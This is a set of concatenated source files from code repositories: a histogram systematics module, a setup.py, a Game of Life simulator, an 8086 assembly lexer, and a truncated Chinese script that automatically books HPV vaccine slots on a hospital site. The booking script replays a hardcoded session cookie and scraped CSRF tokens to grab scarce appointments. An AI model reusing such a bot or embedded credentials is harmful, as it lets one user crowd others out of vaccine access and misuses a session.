from typing import Union, Optional, Tuple, List
from templatefitter.binned_distributions.binning import Binning
from templatefitter.binned_distributions.weights import Weights, WeightsInputType
logging.getLogger(__name__).addHandler(logging.NullHandler())
# Public API of this module.
# NOTE(review): "SystematicsInfo" is expected to be defined further down in
# this file — it is not among the classes visible here; confirm it exists.
__all__ = [
    "SystematicsInfo",
    "SystematicsInputType"
]
# Per-source uncertainty input: one weights-like object or a list of them.
SystematicsUncertInputType = Union[WeightsInputType, List[WeightsInputType]]
# From-variation input: (per-event weights, per-event uncertainty/-ies).
SystematicsFromVarInputType = Tuple[WeightsInputType, SystematicsUncertInputType]
# Pre-computed covariance matrix input.
MatrixSystematicsInputType = np.ndarray
SingleSystematicsInputType = Union[None, MatrixSystematicsInputType, SystematicsFromVarInputType]
MultipleSystematicsInputType = List[SingleSystematicsInputType]
# Top-level input: nothing, a single systematics item, or a list of items.
SystematicsInputType = Union[None, SingleSystematicsInputType, MultipleSystematicsInputType]
class SystematicsInfoItem(ABC):
    """Abstract base class for a single source of systematic uncertainty.

    Concrete subclasses supply the uncertainty either as a ready-made
    covariance matrix or derive it from varied histograms.
    """
    def __init__(self):
        # Filled in by subclasses: discriminator string plus the payload
        # (per-event weights/uncertainties or a pre-computed covariance).
        self._sys_type = None
        self._sys_weight = None
        self._sys_uncert = None
        self._cov_matrix = None
    @abstractmethod
    def get_covariance_matrix(
            self,
            data: Optional[np.ndarray] = None,
            weights: WeightsInputType = None,
            binning: Optional[Binning] = None
    ) -> np.ndarray:
        # Must return a (num_bins_total x num_bins_total) covariance matrix.
        raise NotImplementedError()
    @abstractmethod
    def get_varied_hist(
            self,
            initial_varied_hists: Optional[Tuple[np.ndarray, ...]],
            data: Optional[np.ndarray] = None,
            weights: WeightsInputType = None,
            binning: Optional[Binning] = None
    ) -> Tuple[np.ndarray, ...]:
        # Must return per-variation histograms, accumulated onto
        # initial_varied_hists when provided.
        raise NotImplementedError()
    @staticmethod
    @abstractmethod
    def get_cov_from_varied_hists(varied_hists) -> np.ndarray:
        # Must build a covariance matrix from the varied histograms.
        raise NotImplementedError()
class SystematicsInfoItemFromCov(SystematicsInfoItem):
    """Systematic uncertainty supplied directly as a pre-computed covariance
    matrix; varied-histogram access is therefore unsupported."""

    def __init__(self, cov_matrix: np.ndarray):
        super().__init__()
        assert isinstance(cov_matrix, np.ndarray), type(cov_matrix)
        assert cov_matrix.ndim == 2, cov_matrix.shape
        assert cov_matrix.shape[0] == cov_matrix.shape[1], cov_matrix.shape
        self._sys_type = "cov_matrix"
        self._cov_matrix = cov_matrix

    def get_covariance_matrix(
            self,
            data: Optional[np.ndarray] = None,
            weights: WeightsInputType = None,
            binning: Optional[Binning] = None
    ) -> np.ndarray:
        assert binning is not None
        matrix = self._cov_matrix
        # The stored matrix must match the binning it is used with.
        assert matrix.shape[0] == matrix.shape[1], matrix.shape
        assert binning.num_bins_total == matrix.shape[0], (binning.num_bins_total, matrix.shape)
        return matrix

    def get_varied_hist(self, initial_varied_hists, data=None, weights=None, binning=None) -> None:
        raise NotImplementedError("This method is not (yet) supported for systematics provided via covariance matrix.")

    @staticmethod
    def get_cov_from_varied_hists(varied_hists: Tuple[np.ndarray, ...]) -> None:
        raise NotImplementedError("This method is not (yet) supported for systematics provided via covariance matrix.")
class SystematicsInfoItemFromUpDown(SystematicsInfoItem):
    """Systematic uncertainty given per event as a weight plus its absolute
    up/down uncertainty; covariance is derived from up/down varied histograms."""
    def __init__(self, sys_weight: np.ndarray, sys_uncert: np.ndarray):
        super().__init__()
        self._sys_type = "up_down"
        assert isinstance(sys_uncert, np.ndarray), type(sys_uncert)
        assert len(sys_uncert.shape) == 1, sys_uncert.shape
        # One uncertainty per event weight.
        assert len(sys_weight) == len(sys_uncert), (sys_weight.shape, sys_uncert.shape)
        self._sys_weight = sys_weight
        self._sys_uncert = sys_uncert
    def get_covariance_matrix(
            self,
            data: Optional[np.ndarray] = None,
            weights: WeightsInputType = None,
            binning: Optional[Binning] = None
    ) -> np.ndarray:
        # Covariance from the symmetrized up/down histogram variation.
        varied_hists = self.get_varied_hist(initial_varied_hists=None, data=data, weights=weights, binning=binning)
        covariance_matrix = self.get_cov_from_varied_hists(varied_hists=varied_hists)
        assert len(covariance_matrix.shape) == 2, covariance_matrix.shape
        assert covariance_matrix.shape[0] == covariance_matrix.shape[1] == binning.num_bins_total, \
            (covariance_matrix.shape, binning.num_bins_total)
        return covariance_matrix
    def get_varied_hist(
            self,
            initial_varied_hists: Optional[Tuple[np.ndarray, ...]],
            data: Optional[np.ndarray] = None,
            weights: WeightsInputType = None,
            binning: Optional[Binning] = None
    ) -> Tuple[np.ndarray, np.ndarray]:
        """Return (hist_up, hist_down), accumulated onto initial_varied_hists."""
        assert data is not None
        assert weights is not None
        assert binning is not None
        assert len(self._sys_weight) == len(data), (len(self._sys_weight), len(data))
        if initial_varied_hists is None:
            initial_varied_hists = (np.zeros(binning.num_bins_total), np.zeros(binning.num_bins_total))
        assert len(initial_varied_hists) == 2, len(initial_varied_hists)
        # Only events with positive base weight are rescaled (avoids dividing
        # by a zero systematic weight below).
        wc = weights > 0.
        # Scale each event weight by (sys_weight +/- sys_uncert) / sys_weight.
        weights_up = copy.copy(weights)
        weights_up[wc] = weights[wc] / self._sys_weight[wc] * (self._sys_weight[wc] + self._sys_uncert[wc])
        weights_dw = copy.copy(weights)
        weights_dw[wc] = weights[wc] / self._sys_weight[wc] * (self._sys_weight[wc] - self._sys_uncert[wc])
        # Materialize the bin-edge arrays for numpy's histogramdd.
        bins = [np.array(list(edges)) for edges in binning.bin_edges]
        hist_up, _ = np.histogramdd(data, bins=bins, weights=weights_up)
        hist_dw, _ = np.histogramdd(data, bins=bins, weights=weights_dw)
        assert hist_up.shape == hist_dw.shape, (hist_up.shape, hist_dw.shape)
        # Flatten multi-dimensional histograms so the bins align with the
        # binning's flat total-bin ordering.
        if binning.dimensions > 1:
            flat_hist_up = hist_up.flatten()
            flat_hist_dw = hist_dw.flatten()
            assert flat_hist_up.shape == flat_hist_dw.shape, (flat_hist_up.shape, flat_hist_dw.shape)
            assert flat_hist_up.shape[0] == binning.num_bins_total, (flat_hist_up.shape, binning.num_bins_total)
            return initial_varied_hists[0] + flat_hist_up, initial_varied_hists[1] + flat_hist_dw
        else:
            return initial_varied_hists[0] + hist_up, initial_varied_hists[1] + hist_dw
    @staticmethod
    def get_cov_from_varied_hists(varied_hists: Tuple[np.ndarray, np.ndarray]) -> np.ndarray:
        assert len(varied_hists) == 2, len(varied_hists)
        hist_up, hist_dw = varied_hists
        assert hist_up.shape == hist_dw.shape, (hist_up.shape, hist_dw.shape)
        # Symmetrized variation: half the up-down difference per bin; the
        # outer product yields a rank-1, fully bin-correlated covariance.
        diff_sym = (hist_up - hist_dw) / 2.
        return np.outer(diff_sym, diff_sym)
class SystematicsInfoItemFromVariation(SystematicsInfoItem):
    """Systematic given as a per-event weight plus several alternative variations.

    Each column of ``sys_uncert`` is one full alternative of the systematic
    weight; the covariance is estimated from the spread of the correspondingly
    varied histograms.
    """

    def __init__(self, sys_weight: np.ndarray, sys_uncert: np.ndarray):
        super().__init__()
        assert isinstance(sys_uncert, np.ndarray), type(sys_uncert)
        assert len(sys_uncert.shape) == 2, sys_uncert.shape
        assert sys_uncert.shape[1] > 1, sys_uncert.shape
        assert len(sys_weight) == len(sys_uncert), (sys_weight.shape, sys_uncert.shape)
        self._sys_type = "variation"
        self._sys_weight = sys_weight
        self._sys_uncert = sys_uncert

    def number_of_variations(self) -> int:
        """Number of provided variations (columns of the variation matrix)."""
        return self._sys_uncert.shape[1]

    def get_covariance_matrix(
        self,
        data: Optional[np.ndarray] = None,
        weights: WeightsInputType = None,
        binning: Optional[Binning] = None
    ) -> np.ndarray:
        """Histogram every variation and estimate the covariance from their spread."""
        variation_hists = self.get_varied_hist(initial_varied_hists=None, data=data, weights=weights, binning=binning)
        return self.get_cov_from_varied_hists(varied_hists=variation_hists)

    def get_varied_hist(
        self,
        initial_varied_hists: Optional[Tuple[np.ndarray, ...]],
        data: Optional[np.ndarray] = None,
        weights: WeightsInputType = None,
        binning: Optional[Binning] = None
    ) -> Tuple[np.ndarray, ...]:
        """Return one flattened histogram per variation, stacked on ``initial_varied_hists``."""
        assert data is not None
        assert weights is not None
        assert binning is not None
        assert len(self._sys_weight) == len(data), (len(self._sys_weight), len(data))
        if initial_varied_hists is None:
            initial_varied_hists = tuple([np.zeros(binning.num_bins_total) for _ in range(self.number_of_variations())])
        assert len(initial_varied_hists) == self.number_of_variations(), \
            (len(initial_varied_hists), self.number_of_variations())
        result = []
        for base_hist, variation_column in zip(initial_varied_hists, self._sys_uncert.T):
            # Replace the nominal systematic weight by this variation for all
            # events with positive nominal weight.
            new_weights = copy.copy(weights)
            positive = weights > 0.
            new_weights[positive] = weights[positive] / self._sys_weight[positive] * variation_column[positive]
            edges = [np.array(list(e)) for e in binning.bin_edges]
            result.append(base_hist + np.histogramdd(data, bins=edges, weights=new_weights)[0].flatten())
        assert len(result) == len(initial_varied_hists), (len(result), len(initial_varied_hists))
        assert all(len(h.shape) == 1 for h in result), [h.shape for h in result]
        assert all(h.shape[0] == binning.num_bins_total for h in result), \
            ([h.shape for h in result], binning.num_bins_total)
        return tuple(result)

    @staticmethod
    def get_cov_from_varied_hists(varied_hists: Tuple[np.ndarray, ...]) -> np.ndarray:
        """Sample covariance of the bin contents across the variations."""
        cov = np.cov(np.column_stack(varied_hists))
        assert cov.shape[0] == cov.shape[1] == len(varied_hists[0]), (cov.shape[0], cov.shape[1], len(varied_hists[0]))
        assert not np.isnan(cov).any()
        return cov
class SystematicsInfo(Sequence):
    """Sequence of systematic-uncertainty definitions for one component.

    Accepted inputs for ``in_sys``:
      * ``None``              -> no systematics,
      * ``np.ndarray``        -> a covariance matrix,
      * ``tuple``             -> a single systematic definition,
      * ``list`` of tuples    -> multiple systematic definitions.
    """

    def __init__(
        self,
        in_sys: SystematicsInputType = None,
        data: Optional[np.ndarray] = None,
        in_data: Optional[np.ndarray] = None,
        weights: WeightsInputType = None
    ):
        self._sys_info_list = self._get_sys_info(in_systematics=in_sys, data=data, in_data=in_data, weights=weights)
        super().__init__()

    def _get_sys_info(
        self,
        in_systematics: SystematicsInputType,
        data: np.ndarray,
        in_data: Optional[pd.DataFrame],
        weights: WeightsInputType
    ) -> List[Union[None, SystematicsInfoItem]]:
        """Normalize the accepted input formats into a list of systematics items."""
        if in_systematics is None:
            return []
        # If not None, systematics must be provided as Tuple for one or List of Tuples for multiple.
        if isinstance(in_systematics, np.ndarray):
            return [self._get_sys_info_from_cov_matrix(in_systematics)]
        elif isinstance(in_systematics, tuple):
            return [self._get_single_sys_info(in_systematics, data, in_data, weights)]
        elif isinstance(in_systematics, list):
            return self._get_sys_info_from_list(in_systematics, data, in_data, weights)
        else:
            raise ValueError(f"Provided systematics has unexpected type {type(in_systematics)}.")

    @staticmethod
    def _get_sys_info_from_cov_matrix(in_systematics: SystematicsInputType) -> SystematicsInfoItem:
        """Wrap a square covariance matrix into a systematics item."""
        assert isinstance(in_systematics, np.ndarray), type(in_systematics)
        assert len(in_systematics.shape) == 2, len(in_systematics.shape)
        assert in_systematics.shape[0] == in_systematics.shape[1], (in_systematics.shape[0], in_systematics.shape[1])
        return SystematicsInfoItemFromCov(cov_matrix=in_systematics)

    def _get_single_sys_info(
        self,
        in_systematics: SystematicsInputType,
        data: np.ndarray,
        in_data: Optional[pd.DataFrame],
        weights: WeightsInputType
    ) -> Union[None, SystematicsInfoItem]:
        """Build one systematics item from a tuple definition.

        A 1-tuple must contain a covariance matrix; a 2-tuple contains the
        systematic weight plus either a symmetric uncertainty (-> up/down item)
        or a list of weight variations (-> variation item).
        """
        if in_systematics is None:
            return None
        if len(in_systematics) == 1:
            # Bug fix: the contained matrix must be unwrapped from the 1-tuple.
            # Previously the tuple itself was forwarded, which always failed the
            # ndarray assertion in _get_sys_info_from_cov_matrix.
            return self._get_sys_info_from_cov_matrix(in_systematics[0])
        elif len(in_systematics) == 2:
            sys_weight = Weights.obtain_weights(weight_input=in_systematics[0], data=data, data_input=in_data)
            assert len(sys_weight) == len(data), (len(sys_weight), len(data))
            assert len(sys_weight) == len(weights)
            assert not np.isnan(sys_weight).any()
            # Events with positive nominal weight must have a positive systematic
            # weight, because the systematics items later divide by it.
            assert np.all(sys_weight[weights > 0.] > 0.)
            if isinstance(in_systematics[1], list):
                variations = [Weights.obtain_weights(s, data, in_data) for s in in_systematics[1]]
                # Bug fix: np.column_stack must receive a sequence; modern NumPy
                # rejects generators passed to the stacking functions.
                sys_uncert = np.column_stack(variations)
                assert sys_uncert.shape[1] == len(in_systematics[1]), (sys_uncert.shape, len(in_systematics[1]))
                assert not np.isnan(sys_uncert).any()
                return SystematicsInfoItemFromVariation(sys_weight=sys_weight, sys_uncert=sys_uncert)
            else:
                sys_uncert = Weights.obtain_weights(weight_input=in_systematics[1], data=data, data_input=in_data)
                assert not np.isnan(sys_uncert).any()
                return SystematicsInfoItemFromUpDown(sys_weight=sys_weight, sys_uncert=sys_uncert)
        else:
            raise ValueError(f"Systematics must be provided as tuple or list of tuples"
                             f"or directly as the respective covariance matrix. "
                             f"Each tuple must contain 2 entries!\n"
                             f"A provided tuple was of size {len(in_systematics)} != 2.")

    def _get_sys_info_from_list(
        self,
        in_systematics: SystematicsInputType,
        data: np.ndarray,
        in_data: Optional[pd.DataFrame],
        weights: WeightsInputType
    ) -> List[Union[None, SystematicsInfoItem]]:
        """Build one item per list entry, dropping ``None`` results."""
        if len(in_systematics) == 0:
            return []
        result = [self._get_single_sys_info(in_sys, data, in_data, weights) for in_sys in in_systematics]
        return [e for e in result if e is not None]

    @property
    def as_list(self) -> List[Union[None, SystematicsInfoItem]]:
        """The underlying list of systematics items."""
        return self._sys_info_list

    def __getitem__(self, i) -> Optional[SystematicsInfoItem]:
        return self._sys_info_list[i]

    def __len__(self) -> int:
        return len(self._sys_info_list)
| eckerpatrick/TemplateFitter | templatefitter/binned_distributions/systematics.py | systematics.py | py | 14,197 | python | en | code | null | github-code | 90 |
27620099382 | from setuptools import setup, find_packages
from codecs import open
import os
import re
# Distribution name of the package being built.
package_name = 'mySQLace'
here = os.path.abspath(os.path.dirname(__file__))
# Get the long description from the README file
# NOTE(review): relies on the external `pandoc` binary; the os.system exit
# status is not checked, so a missing pandoc only surfaces when README.rst
# is opened below.
os.system("pandoc -f markdown -t rst README.md -o README.rst")
with open(os.path.join(here, 'README.rst'), encoding='utf-8') as f:
    long_description = f.read()
# Get the version number from the __init__.py file in the package
with open(os.path.join(here, package_name, '__init__.py'), encoding='utf-8') as v:
    version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]", v.read(), re.M)
    if version_match:
        current_version = version_match.group(1)
    else:
        raise RuntimeError("Unable to find version string.")
setup(
    name=package_name,
    version=current_version,
    description="Python interface for MySQL connections",
    long_description=long_description,
    url='https://github.com/jordanncg/mySQLace',
    author='Jordan Yerandi Cortes Guzman',
    author_email='jordancg91@gmail.com',
    license='GPL',
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        'Topic :: Software Development :: Build Tools',
        'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
    ],
    keywords='development mysql connector',
    packages=find_packages(exclude=["contrib", "docs", "tests*"]),
    # To provide executable scripts, use entry points in preference to the
    # "scripts" keyword. Entry points provide cross-platform support and allow
    # pip to create the appropriate form of executable for the target platform.
    entry_points={
        'console_scripts': [
            'mySQLace=mySQLace:main',
        ],
    },
)
| jordancortes/mySQLace | setup.py | setup.py | py | 1,866 | python | en | code | 0 | github-code | 90 |
11504406141 | import LifeGame as lg
import LifeGameUI as lgui
import numpy as np
# Relative tolerance for agreement between two independent sample batches.
TOLERANCE = 0.1
# Initial number of games per sample batch; doubled until convergence.
NUMBER_ITER_INIT = 1000
class LifeGameSim:
    """Monte-Carlo driver for LifeGame runs.

    Repeatedly samples batches of games, doubling the batch size until the mean
    and standard deviation of the 'oldest' statistic agree between two
    independent batches within the requested relative tolerance.
    """

    def __init__(self, life_cols=lgui.LIFE_COLS, life_rows=lgui.LIFE_ROWS, max_gen=lg.MAX_GENERATION, tolerance=TOLERANCE):
        self.life_cols = life_cols
        self.life_rows = life_rows
        self.max_gen = max_gen
        self.tolerance = tolerance

    def run(self, niter_init=NUMBER_ITER_INIT):
        """Run pairs of sample batches of doubling size until they agree.

        Returns the statistics dict of the first batch of the converged pair,
        extended with the batch size used under the key 'n_iter'.
        """
        ni = niter_init
        while True:
            # Two independent batches of the same size are compared.
            print("Running sample 1 for ni =", ni)
            dres1 = self.runSample(ni)
            print("Running sample 2 for ni =", ni)
            dres2 = self.runSample(ni)
            diff_mean_oldest = abs(dres1['mean_oldest'] - dres2['mean_oldest'])
            diff_std_oldest = abs(dres1['stdev_oldest'] - dres2['stdev_oldest'])
            # Converged only when both statistics agree relative to BOTH batches.
            if (diff_mean_oldest < dres1['mean_oldest'] * self.tolerance
                    and diff_mean_oldest < dres2['mean_oldest'] * self.tolerance
                    and diff_std_oldest < dres1['stdev_oldest'] * self.tolerance
                    and diff_std_oldest < dres2['stdev_oldest'] * self.tolerance):
                break
            ni *= 2
        dres1['n_iter'] = ni
        return dres1

    def runSample(self, ni):
        """Run ``ni`` silent games; return mean/stdev of the 'oldest' statistic."""
        aoldest = np.zeros(ni)
        for i in range(ni):
            print(".", end='', flush=True)  # progress indicator: one dot per game
            lgame = lg.LifeGame(life_cols=self.life_cols, life_rows=self.life_rows, max_gen=self.max_gen, no_gui=True, silent=True)
            dresults = lgame.run()
            aoldest[i] = dresults['oldest']
        print("!", flush=True)
        dres = {}
        # nan-aware statistics, in case individual runs report NaN.
        dres['mean_oldest'] = np.nanmean(aoldest)
        dres['stdev_oldest'] = np.nanstd(aoldest, ddof=0)
        print("Average oldest: ", dres['mean_oldest'])
        print("Standard deviation: ", dres['stdev_oldest'])
        return dres
| chintonp/LifeGame | LifeGame/LifeGameSim.py | LifeGameSim.py | py | 2,215 | python | en | code | 0 | github-code | 90 |
21674879188 | import os
import ply.lex as lex
symbolTable = {}
registers = {
'AX': 'AX',
'BX': 'BX',
'CX': 'CX',
'DX': 'DX',
'AH': 'AH',
'AL': 'AL',
'BH': 'BH',
'BL': 'BL',
'CH': 'CH',
'CL': 'CL',
'DH': 'DH',
'DL': 'DL',
'DI': 'DI',
'SI': 'SI',
'BP': 'BP',
'SP': 'SP',
'DS': 'DS',
'ES': 'ES',
'SS': 'SS',
'CS': 'CS'
}
reserved = {
'MOV': 'MOV',
'ADD': 'ADD',
'SEGMENT': 'SEGMENT_START',
'INT': 'INT',
'ENDS': 'SEGMENT_ENDS',
'END': 'END_LABEL',
'DB': 'DB',
'LOOPNE': 'LOOPNE',
'LOOP': 'LOOP',
'LEA': 'LEA',
'SHL': 'SHL',
'CMP': 'CMP',
'SHR': 'SHR',
'INC': 'INC',
'DUP': 'DUP',
'RET': 'RET'
} | registers
tokens = [
'SUB',
'SEPARATOR',
'DECIMALNUMBER',
'BINARYNUMBER',
'OCTALNUMBER',
'HEXNUMBER',
'ID',
'PLUS',
'MINUS',
'COLON',
'ASSUME',
'LBRACKET',
'RBRACKET',
'AND',
'DQUOTE',
'SQUOTE',
'STRING',
'LPAREN',
'RPAREN'
] + list(reserved.values())
t_DQUOTE = r'"'
t_SQUOTE = r'\''
t_SEPARATOR = r','
t_ignore = ' \t'
t_PLUS = r'\+'
t_MINUS = r'-'
t_COLON = r':'
t_LBRACKET = r'\['
t_RBRACKET = r'\]'
t_LPAREN = r'\('
t_RPAREN = r'\)'
t_HEXNUMBER = r'(0[xXhH][ABCDEFabcdef0-9]+)|([ABCDEFabcdef0-9]+[hH])'
t_DECIMALNUMBER = r'(0[dD]\d+)|(\d+[dD]?)'
t_OCTALNUMBER = r'(0[qQoO][0-7]+)|([0-7]+[qQoO])'
t_BINARYNUMBER = r'([01]+[bByY])|(0[bByY][01]+)'
def t_RET(t):
    r'(?i)RET'
    # Keyword rule (case-insensitive); the docstring above is the ply regex.
    return t
def t_DUP(t):
    r'(?i)DUP'
    # Bug fix: this rule previously ended with a bare `return`, silently
    # discarding every DUP token even though 'DUP' is a declared token type
    # (needed for declarations such as `DB 10 DUP(0)`). All sibling keyword
    # rules return the token; this one now does too.
    return t
# Function rules: ply tries these in definition order and before t_ID, so the
# mnemonics below are recognized case-insensitively as their own token types.
# The raw-string docstring of each function IS the matching regex.
def t_STRING(t):
    r'(".+")|(\'.+\')'
    return t
def t_ADD(t):
    r'(?i)ADD'
    return t
def t_SUB(t):
    r'(?i)SUB'
    return t
def t_SHL(t):
    r'(?i)SHL'
    return t
def t_CMP(t):
    r'(?i)CMP'
    return t
def t_INC(t):
    r'(?i)INC'
    return t
def t_LEA(t):
    r'(?i)LEA'
    return t
def t_INT(t):
    r'(?i)INT'
    return t
def t_MOV(t):
    r'(?i)MOV'
    return t
def t_LOOPNE(t):
    r'(?i)LOOPNE'
    return t
def t_LOOP(t):
    r'(?i)LOOP'
    return t
def t_ASSUME(t):
    r'(?i)ASSUME'
    return t
def t_ignore_TITLE(t):
    r'(?i)TITLE.*'
    # TITLE directive lines are skipped entirely (no token returned).
def t_COMMENT(t):
    r';.*'
    # Comments (';' to end of line) are discarded.
def t_ID(t):
    r'[a-zA-Z_][a-zA-Z_0-9]*'
    t.type = reserved.get(t.value, 'ID')  # Check for reserved words
    # NOTE(review): the lookup is case-sensitive, so lower-case mnemonics such
    # as "mov" fall through to a plain ID token — confirm this is intended.
    return t
def t_error(t):
    # Report and skip a single illegal character, then resume lexing.
    print("Illegal character '%s'" % t.value[0])
    t.lexer.skip(1)
def t_newline(t):
    r'\n+'
    # Keep line numbers accurate for error reporting.
    t.lexer.lineno += len(t.value)
# Driver: read an assembly source file and dump its token stream.
fileName = input("Enter filepath:")
with open(fileName, 'r') as f:
    data = f.read()
lexer = lex.lex()
lexer.input(data)
while True:
    tok = lexer.token()
    if not tok:
        break # No more input
    print(tok)
| giannhs694/Assembly8086Compiler | Assembly8086Lexer.py | Assembly8086Lexer.py | py | 3,042 | python | en | code | 0 | github-code | 90 |
2345962124 | import os
import re
import time
import urllib
from datetime import datetime
from urllib import request, parse
from lxml import html
from urllib.parse import quote
import _thread
from multiprocessing import Process
import smtplib
import urllib
from email.header import Header
from datetime import datetime
from email.mime.text import MIMEText
# Shared request headers; capture your own traffic and refill the Cookie value.
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 '
                  'Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63030532)',
    'Host': 'sych.xiaoerfang.cn',
    "Cookie": "_csrf=9133752109ef502c887da9c6ced273f981a89aeee34932eb33f7156eed9389fda%3A2%3A%7Bi%3A0%3Bs%3A5%3A"
              "%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22MsQiC1t36K_kE5oRksbquHFUmZapKS00%22%3B%7D; "
              "PHPSESSID=fesorlm206odi5qbg6nhuki0sm; "
              "_identity=7d042ddbddc61566b1a8bfc98321906b4af3d0a8da2737e9ce55cfa90c0b9cf4a%3A2%3A%7Bi%3A0%3Bs%3A9%3A"
              "%22_identity%22%3Bi%3A1%3Bs%3A53%3A%22%5B%22433796%22%2C%22sBETxTqvITVgM7jcZJCL9_BBjfK76_eh%22"
              "%2C2592000%5D%22%3B%7D",
}
# URL for querying remaining 9-valent HPV vaccine slots for a given date
dataurl = "https://sych.xiaoerfang.cn/sychwx/index.php?r=source%2Flist&specCode=442&specName=%E7%96%AB%E8%8B%97%E6%8E%A5%E7%A7%8D%E9%97%A8%E8%AF%8A&deptType=0&oneDeptId=285&twoDeptId=442&visitDate="
# Default endpoint of the booking POST request
posturl = "https://sych.xiaoerfang.cn/sychwx/index.php?r=source%2Finfo"
# Default URL from which the CSRF token for the 9-valent vaccine page is scraped
csrfurl = "https://sych.xiaoerfang.cn/sychwx/index.php?r=source%2Findex&deptId=442&twoDeptName=%E7%96%AB%E8%8B%97%E6" \
          "%8E%A5%E7%A7%8D%E9%97%A8%E8%AF%8A&deptType=0&oneDeptId=285&oneDeptName=%E5%A6%87%E5%A5%B3%E5%81%A5%E5%BA" \
          "%B7%E4%BF%9D%E5%81%A5%E4%B8%AD%E5%BF%83"
# specCode values of the bookable appointment dates
global_specCode = []
# specName values of the bookable appointment dates
global_specName = []
# regToken values of the bookable appointment dates
# 0: morning  1: afternoon  2: evening
global_regToken = []
# medFee values of the bookable appointment dates
global_medFee = []
# CSRF token of the current session
csrf = ""
# Target date, format 1 (YYYY-MM-DD)
data1 = "2021-11-24"
# Target date, format 2 (YYYYMMDD)
data2 = "20211124"
# Time-slot start (HH:MM)
time1 = "09:30"
# Time-slot end (HH:MM)
time2 = "10:00"
# Select morning (0) or afternoon (1)
ap = 0
# Mailbox that receives availability notifications
inbox = "xxxxxx@163.com"
# Logging helper
def wrLog(str2):
    """Append a timestamped message to ``log.txt``."""
    timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S %f')
    with open('log.txt', 'a') as log_file:
        log_file.write(f"{timestamp} {str2}\n")
# Fetch the csrf_token in preparation for booking
def getcsrf():
    """Populate the global ``csrf`` token, caching the fetched page in csrf.html."""
    global csrf, csrfurl
    data = ""
    try:
        if os.path.exists("csrf.html"):
            # Reuse the cached page instead of hitting the server again.
            print("File csrf.html already exist!")
            with open('csrf.html', 'r') as f:
                data = f.read()
            searchObj = re.search(r'var _csrf = "(.*)"', data, re.M | re.I)
            csrf = searchObj.group(1)
            wrLog("成功获取csrf_token")
            print("成功获取csrf_token")
            print(csrf)
            return
        else:
            req = request.Request(url=csrfurl, headers=headers, method='GET')
            response = request.urlopen(req)
            data = response.read().decode('utf-8')
            searchObj = re.search(r'var _csrf = "(.*)"', data, re.M | re.I)
            csrf = searchObj.group(1)
            if csrf != "":
                # Cache the page so later calls can skip the network round trip.
                with open('csrf.html', 'w') as f:
                    f.writelines(data)
                wrLog("成功获取csrf_token")
                print("成功获取csrf_token")
                print(csrf)
                return
    except:
        # Any failure (network, regex miss) is reported via the log only.
        wrLog("获取失败csrf_token")
        print("获取失败csrf_token")
def regTokenHTML(specname="宫颈癌九价疫苗门诊", url=dataurl):
    """Fetch the slot-list page for date ``data1`` and cache it as regToken.html.

    The cache is only written when at least one slot matching ``specname``
    exists; all failures are silently ignored (best-effort refresh loop).
    """
    try:
        getcsrf()
    except:
        return
    try:
        url = url + data1
        req = request.Request(url=url, headers=headers, method='GET')
        response = request.urlopen(req)
        data = response.read().decode('utf-8')
        selector = html.etree.HTML(data)
        # Parse out specCode entries for the requested clinic name.
        xpathstr = "//div[@specname=\"" + specname + "\"]/@"
        specCode = selector.xpath(xpathstr + "speccode")
        if specCode != []:
            with open('regToken.html', 'w') as f:
                f.writelines(data)
        else:
            return
    except:
        return
# Extract the expanded slot parameters (regToken, fees, times) from the caches
def expand(specname="宫颈癌九价疫苗门诊", url=dataurl):
    """Parse the csrf.html/regToken.html caches and fill the global slot data.

    Returns 1 on success, 0 on any failure (missing caches, no matching slots).
    """
    global global_regToken, global_medFee, global_specCode, global_specName, data1, data2
    data = ""
    try:
        try:
            if os.path.exists("csrf.html"):
                print("File csrf.html already exist!")
                with open('csrf.html', 'r') as f:
                    data = f.read()
                searchObj = re.search(r'var _csrf = "(.*)"', data, re.M | re.I)
                # NOTE(review): this assigns a LOCAL csrf (no `global` here),
                # so the module-level token is not updated — confirm intended.
                csrf = searchObj.group(1)
                wrLog("成功获取csrf_token")
                print("成功获取csrf_token")
                print(csrf)
            else:
                return 0
        except:
            return 0
        # If regToken.html is already cached, read it locally and skip the fetch.
        if os.path.exists("regToken.html"):
            print("File regToken.html already exist!")
            with open('regToken.html', 'r') as f:
                data = f.read()
        else:
            return 0
        selector = html.etree.HTML(data)
        # Parse specCode and specName entries for the requested clinic.
        xpathstr = "//div[@specname=\"" + specname + "\"]/@"
        specCode = selector.xpath(xpathstr + "speccode")
        if specCode != []:
            specName = selector.xpath(xpathstr + "specname")
            index = 0
            for i in specName:
                specName[index] = quote(i, 'utf-8')
                index = index + 1
            medFee = selector.xpath(xpathstr + "medfee")
            regToken = selector.xpath(xpathstr + "regtoken")
            visitTimeName = selector.xpath(xpathstr + "visittimename")
            # Publish the parsed values through the module-level globals.
            global_regToken = regToken
            global_medFee = medFee
            global_specCode = specCode
            global_specName = specName
            print("specCode", specCode)
            print("specName", specName)
            print("medFee", medFee)
            print("regToken", regToken)
            print("visitTimeName", visitTimeName)
            wrLog("成功获取regToken")
            print("成功获取regToken")
            return 1
        else:
            wrLog("获取regToken失败")
            print("获取regToken失败")
            return 0
    except:
        wrLog("获取regToken失败")
        print("获取regToken失败")
        return 0
# Send the booking POST request and return the server's response
def postpack(posturl=posturl):
    """POST the selected slot; return the response text, "" if no csrf token
    is available, or 0 on failure."""
    global global_regToken, global_medFee, csrf, global_specCode, data2, time1, time2
    global ap
    try:
        # A second request is needed: refresh the csrf token first.
        getcsrf()
        data = ""
        if csrf == "":
            return data
        # The specCode here is tied to the time slot.
        # deptId is the parent department id.
        # deptName: the clinic/department.
        # specName: the specialist/service.
        # 1236 442
        d = {'deptId': '442',
             'deptName': '疫苗接种门诊',
             'specName': '宫颈癌九价疫苗门诊',
             'specCode': global_specCode[ap],
             'medFee': global_medFee[ap],
             'visitDate': data2,
             'regToken': global_regToken[ap],
             'startTime': time1,
             'endTime': time2,
             'doctorCode': '',
             'doctorName': '',
             'doctorFlag': '',
             '_csrf': csrf
             }
        data = bytes(urllib.parse.urlencode(d), encoding='utf8')
